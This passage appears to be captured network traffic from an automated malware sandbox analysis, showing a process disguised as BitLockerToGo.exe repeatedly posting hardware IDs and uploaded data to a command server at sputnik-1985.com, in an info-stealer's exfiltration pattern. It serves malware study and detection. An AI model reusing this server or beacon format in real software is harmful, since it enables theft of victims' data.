                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 54 2f 2b 75 2f 4e 78 41 33 4b 55 44 75 47 47 57 55 4b 39 44 4e 77 4b 51 72 45 31 76 70 6b 35 43 56 39 6e 78 4d 67 6e 36 55 33 30 57 71 71 50 59 33 4b 32 67 70 41 50 34 53 66 76 52 37 69 5a 4f 56 72 58 52 48 50 4f 6e 5a 7a 39 65 2f 4b 31 47 43 61 4a 53 65 42 75 44 70 76 6e 51 35 65 69 35 6d 6b 47 63 2f 72 43 37 4a 30 76 6d 4d 50 55 52 78 2b 59 36 47 79 65 52 6f 54 63 77 33 77 70 6c 4c 73 76 54 34 4c 78 59 35 49 52 69 52 44 6d 57 35 61 49 61 44 38 72 45 30 55 48 76 70 69 4e 71 69 36 32 5a 46 31 53 47 55 6c 30 58 30 75 2b 41 6e 59 54 6c 74 53 65 34 59 64 66 4e 7a 69 35 43 51 34 6d 68 42 4d 75 62 5a 67 63 57 70 4f 51 32 43 49 70 53 42 52 62 58 34 71 6d 55 70 65 6e 39 62 36 58 34 62 6a 79 2f 59 78 73 43 69 65 48 42 33 36 35 37 58 79 37 46 6b 41 35 6f 4a 6c 4a
                                                                                                                                                                                                            Data Ascii: T/+u/NxA3KUDuGGWUK9DNwKQrE1vpk5CV9nxMgn6U30WqqPY3K2gpAP4SfvR7iZOVrXRHPOnZz9e/K1GCaJSeBuDpvnQ5ei5mkGc/rC7J0vmMPURx+Y6GyeRoTcw3wplLsvT4LxY5IRiRDmW5aIaD8rE0UHvpiNqi62ZF1SGUl0X0u+AnYTltSe4YdfNzi5CQ4mhBMubZgcWpOQ2CIpSBRbX4qmUpen9b6X4bjy/YxsCieHB3657Xy7FkA5oJlJ
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 2b 43 39 39 4e 79 6c 63 76 77 42 39 38 58 71 46 6c 70 54 6c 61 67 78 6a 73 59 44 58 6b 37 45 7a 45 59 78 77 78 70 6c 64 73 72 79 37 5a 54 31 2f 61 6b 36 74 42 78 75 66 44 39 44 45 78 71 51 71 53 58 4f 77 74 36 47 6b 7a 31 56 57 77 54 37 61 33 68 50 6a 75 2f 59 33 49 44 6b 78 59 65 34 49 5a 5a 35 6d 6e 74 75 48 36 6e 70 72 66 2f 47 58 6b 4a 50 67 4a 6d 54 4d 4e 39 58 50 46 65 58 30 39 31 6b 5a 57 43 6b 57 37 6b 5a 6c 2b 58 71 51 67 38 4f 6a 65 67 59 73 72 63 4c 43 31 71 59 37 45 64 31 2b 7a 5a 6b 54 73 71 50 71 4f 57 39 72 4b 51 44 75 42 79 61 7a 4f 74 6a 41 30 62 46 39 59 45 4c 59 6c 35 43 45 35 33 74 4f 7a 68 48 58 79 41 2f 4d 78 61 31 30 49 58 64 75 54 72 38 41 61 2b 45 6e 6e 70 76 2b 38 6e 49 65 51 37 48 5a 6a 38 57 70 4b 33 62 42 50 74 72 65 45 2b 4f
                                                                                                                                                                                                            Data Ascii: +C99NylcvwB98XqFlpTlagxjsYDXk7EzEYxwxpldsry7ZT1/ak6tBxufD9DExqQqSXOwt6Gkz1VWwT7a3hPju/Y3IDkxYe4IZZ5mntuH6nprf/GXkJPgJmTMN9XPFeX091kZWCkW7kZl+XqQg8OjegYsrcLC1qY7Ed1+zZkTsqPqOW9rKQDuByazOtjA0bF9YELYl5CE53tOzhHXyA/Mxa10IXduTr8Aa+Ennpv+8nIeQ7HZj8WpK3bBPtreE+O
                                                                                                                                                                                                            2025-01-10 10:34:30 UTC1369INData Raw: 45 64 58 64 62 78 48 4e 61 4a 71 38 73 54 4b 76 67 52 67 53 2b 36 65 68 38 66 58 61 46 58 42 63 4a 71 5a 48 62 4b 6a 2b 46 6f 39 66 6e 6c 62 37 47 77 69 72 43 53 65 33 49 6d 72 65 6b 67 38 70 38 72 5a 78 65 4d 72 47 34 4a 33 31 38 73 58 39 50 69 75 64 47 68 48 56 33 57 38 52 7a 57 69 61 75 2f 4f 77 36 51 76 58 57 7a 34 70 36 6d 6f 34 32 78 54 77 58 4c 78 34 30 66 44 37 62 74 33 49 58 34 70 46 75 35 59 5a 66 6c 6f 38 39 48 41 6f 6a 6b 63 57 63 58 62 70 70 50 79 61 30 33 46 63 4a 71 5a 43 62 4b 6a 2b 48 6f 39 66 6e 6c 62 34 6b 63 2f 70 6d 6a 42 6a 64 37 79 4c 42 34 6b 72 4e 66 58 6c 37 45 7a 41 34 55 2b 32 64 67 47 2f 50 69 71 5a 53 6c 36 66 31 76 70 66 68 75 4f 49 39 2f 54 79 71 4d 33 57 6d 72 42 70 37 43 44 39 47 78 39 2f 41 66 46 33 68 57 77 33 62 74 68
                                                                                                                                                                                                            Data Ascii: EdXdbxHNaJq8sTKvgRgS+6eh8fXaFXBcJqZHbKj+Fo9fnlb7GwirCSe3Imrekg8p8rZxeMrG4J318sX9PiudGhHV3W8RzWiau/Ow6QvXWz4p6mo42xTwXLx40fD7bt3IX4pFu5YZflo89HAojkcWcXbppPya03FcJqZCbKj+Ho9fnlb4kc/pmjBjd7yLB4krNfXl7EzA4U+2dgG/PiqZSl6f1vpfhuOI9/TyqM3WmrBp7CD9Gx9/AfF3hWw3bth


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.549796104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:31 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1HOV66FNDB7NHB
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 12818
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:31 UTC12818OUTData Raw: 2d 2d 31 48 4f 56 36 36 46 4e 44 42 37 4e 48 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 31 48 4f 56 36 36 46 4e 44 42 37 4e 48 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 48 4f 56 36 36 46 4e 44 42 37 4e 48 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 0d 0a 2d 2d 31
                                                                                                                                                                                                            Data Ascii: --1HOV66FNDB7NHBContent-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--1HOV66FNDB7NHBContent-Disposition: form-data; name="pid"2--1HOV66FNDB7NHBContent-Disposition: form-data; name="lid"HpOoIh--bd4e81951306--1
                                                                                                                                                                                                            2025-01-10 10:34:32 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:32 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=pvmaui4betlbe2f7m4hagi96vg; expires=Tue, 06 May 2025 04:21:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXGeP4Fl1k5PlgZFPG0l%2BLaoaq9sC4bbbUxHrGvuYY%2FommYferazbbfV%2B0%2F6U0S3PsuVaSsn7f%2FKCDpDiWMATv89lWWFtFiDMnPRlGW4q70zRFXMyOAv59skh6jmP%2BM8bJa8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc03dcbb49c461-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1581&rtt_var=608&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13754&delivery_rate=1778319&cwnd=228&unsent_bytes=0&cid=085369153f1f20da&ts=545&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:34:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.549805104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:33 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=GR9J0UZM8CJ54HBX912
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 15090
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:33 UTC15090OUTData Raw: 2d 2d 47 52 39 4a 30 55 5a 4d 38 43 4a 35 34 48 42 58 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 47 52 39 4a 30 55 5a 4d 38 43 4a 35 34 48 42 58 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 52 39 4a 30 55 5a 4d 38 43 4a 35 34 48 42 58 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64
                                                                                                                                                                                                            Data Ascii: --GR9J0UZM8CJ54HBX912Content-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--GR9J0UZM8CJ54HBX912Content-Disposition: form-data; name="pid"2--GR9J0UZM8CJ54HBX912Content-Disposition: form-data; name="lid"HpOoIh--bd
                                                                                                                                                                                                            2025-01-10 10:34:33 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:33 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ek1go8dpjibfrap205fluke684; expires=Tue, 06 May 2025 04:21:12 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5jXoVrHKzuzmiCdKFeeBuGikeW08AeyeV2MVk5E3tXyPXVRfyhDwydzyCRSaNm0evb6siTKd33M3V76ALppibuVuR42Etpibu2c8ZjxC8ezgOoKuP3xskZoRTIe0lAKN53nH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc03e5c8438cda-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1961&min_rtt=1943&rtt_var=764&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16031&delivery_rate=1399137&cwnd=243&unsent_bytes=0&cid=a15be5b69896ca35&ts=558&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:33 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:34:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.561984104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:34 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ZYZGZAHRUJ4BYWG
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 20556
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:34 UTC15331OUTData Raw: 2d 2d 5a 59 5a 47 5a 41 48 52 55 4a 34 42 59 57 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 5a 59 5a 47 5a 41 48 52 55 4a 34 42 59 57 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 5a 59 5a 47 5a 41 48 52 55 4a 34 42 59 57 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 0d 0a
                                                                                                                                                                                                            Data Ascii: --ZYZGZAHRUJ4BYWGContent-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--ZYZGZAHRUJ4BYWGContent-Disposition: form-data; name="pid"3--ZYZGZAHRUJ4BYWGContent-Disposition: form-data; name="lid"HpOoIh--bd4e81951306
                                                                                                                                                                                                            2025-01-10 10:34:34 UTC5225OUTData Raw: 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb
                                                                                                                                                                                                            Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`
                                                                                                                                                                                                            2025-01-10 10:34:35 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:35 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=qqafddt050rmr7n8moi8ucfpe1; expires=Tue, 06 May 2025 04:21:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r3XaFeDiM%2F8kDgNi%2BpE9FPdnoJMxXlD2r3qAj6gBYbV0dAuY2fB%2B4FawGvn8j%2BuhcpnReJnsWXM2Is0y6vNCCH5YCa%2BL2l1mIjcaSVFAWX9aEXjpwSnnigyocgtV6BbMpJsk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc03edd803c461-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1558&rtt_var=597&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21515&delivery_rate=1811414&cwnd=228&unsent_bytes=0&cid=08f255db4e0d3b08&ts=633&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:34:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.562001104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:37 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=IBNC1KXRCOYG
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1217
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:37 UTC1217OUTData Raw: 2d 2d 49 42 4e 43 31 4b 58 52 43 4f 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 49 42 4e 43 31 4b 58 52 43 4f 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 42 4e 43 31 4b 58 52 43 4f 59 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 0d 0a 2d 2d 49 42 4e 43 31 4b 58
                                                                                                                                                                                                            Data Ascii: --IBNC1KXRCOYGContent-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--IBNC1KXRCOYGContent-Disposition: form-data; name="pid"1--IBNC1KXRCOYGContent-Disposition: form-data; name="lid"HpOoIh--bd4e81951306--IBNC1KX
                                                                                                                                                                                                            2025-01-10 10:34:38 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:38 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=7oolv6g6mk0o0fnpgqunroasch; expires=Tue, 06 May 2025 04:21:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t4h4Nvi97872I4j0d63xQG1xF4gJPwiQqiTF2FlLEeLz%2FtCHAAs2IvwqlsCzY8Fisn63xxQuqzjHOnUXKZ73SCUxmtHCYcceMYMMiZWSPQ6DG9WD2sT7SwS6%2BEhuZwKhvZ6t"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc03fdb8f18cda-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1870&min_rtt=1863&rtt_var=712&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2128&delivery_rate=1521625&cwnd=243&unsent_bytes=0&cid=d5843d305f84670b&ts=1507&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:34:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            7192.168.2.562017104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:39 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=G1ZN91Z2ZW
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 1079
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:39 UTC1079OUTData Raw: 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35 0d 0a 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 0d 0a 2d 2d 47 31 5a 4e 39 31 5a 32 5a 57 0d 0a 43
                                                                                                                                                                                                            Data Ascii: --G1ZN91Z2ZWContent-Disposition: form-data; name="hwid"2C1B840C4ED5F58F4EC0E979F11769B5--G1ZN91Z2ZWContent-Disposition: form-data; name="pid"1--G1ZN91Z2ZWContent-Disposition: form-data; name="lid"HpOoIh--bd4e81951306--G1ZN91Z2ZWC
                                                                                                                                                                                                            2025-01-10 10:34:39 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:39 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0kvbff9l9d9icjtb1kmrq3cvd3; expires=Tue, 06 May 2025 04:21:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVHwkuMVkvQqkkHsofD4RDxw1649MdoxZyci06JjYGilVclRODSDmHHRD8AIIe6f1AbpdXEzCw1%2Bb6dBj8H%2F8PwAIe7gl5WNiWI91QPTlC2saf6waN%2F86DfcXfkricwrLWVP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc040adc6142e9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1725&rtt_var=659&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1988&delivery_rate=1645997&cwnd=240&unsent_bytes=0&cid=c8dcacb07848ce4c&ts=583&x=0"
